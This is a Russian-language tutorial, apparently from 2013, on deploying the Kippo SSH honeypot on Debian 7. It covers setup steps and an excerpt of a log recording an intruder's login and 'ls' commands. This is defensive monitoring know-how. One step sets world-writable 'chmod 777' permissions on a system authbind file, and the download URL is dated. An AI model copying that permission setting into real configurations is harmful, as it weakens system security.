Устанавливаем ssh honeypot на Debian 7 ( kippo )
1. Устанавливаем необходимое
apt-get install python-twisted authbind
2. Создаем пользователя и необходимые для работы каталоги и файлы
adduser kippo
touch /etc/authbind/byport/22
chown kippo:kippo /etc/authbind/byport/22
chmod 777 /etc/authbind/byport/22
cd /home/kippo
su kippo
3. Тянем себе honeypot
svn checkout http://kippo.googlecode.com/svn/trunk/ ./kippo
4. Меняем конфиги
mv kippo.cfg.dist kippo.cfg
Далее меняем в конфиге kippo.cfg порт с 2222 на 22
Далее меняем в start.sh
— twistd -y kippo.tac -l log/kippo.log —pidfile kippo.pid
+ authbind —deep twistd -y kippo.tac -l log/kippo.log —pidfile kippo.pid
5. Запускаем kippo :
./start.sh
kippo@XXX:~/kippo$ ./start.sh
Starting kippo in background...Generating RSA keypair...
done.
6. Далее можем только проверять логи в /home/kippo/kippo/log/kippo.log
После того, как пароль сбрутят ( стандартный пароль 123456 ) злоумышленник попадет в своеобразную виртуальную оболочку, через которую не сможет увидеть любую важную информацию и каждый его шаг будет залоггирован. Вот часть лога :
2013-11-20 18:03:46+0400 [SSHService ssh-userauth on HoneyPotTransport,0,xx.xx.xx.xx] login attempt [root/123456] succeeded
2013-11-20 18:03:46+0400 [SSHService ssh-userauth on HoneyPotTransport,0,xx.xx.xx.xx] root authenticated with keyboard-interactive
2013-11-20 18:03:46+0400 [SSHService ssh-userauth on HoneyPotTransport,0,xx.xx.xx.xx] starting service ssh-connection
2013-11-20 18:03:46+0400 [SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] got channel session request
2013-11-20 18:03:46+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] channel open
2013-11-20 18:03:46+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] pty request: xterm (24, 80, 0, 0)
2013-11-20 18:03:46+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] Terminal size: 24 80
2013-11-20 18:03:46+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] getting shell
2013-11-20 18:03:46+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] Opening TTY log: log/tty/20131120-180346-4421.log
2013-11-20 18:03:46+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] /etc/motd resolved into /etc/motd
2013-11-20 18:03:48+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] CMD: ls
2013-11-20 18:03:48+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] Command found: ls
2013-11-20 18:03:49+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] CMD: ls -la
2013-11-20 18:03:49+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] Command found: ls -la
2013-11-20 18:03:56+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] CMD: ls /
2013-11-20 18:03:56+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] Command found: ls /
2013-11-20 18:04:03+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] CMD: ls /root/
2013-11-20 18:04:03+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] Command found: ls /root/
2013-11-20 18:04:06+0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,xx.xx.xx.xx] CMD: ls -al /root/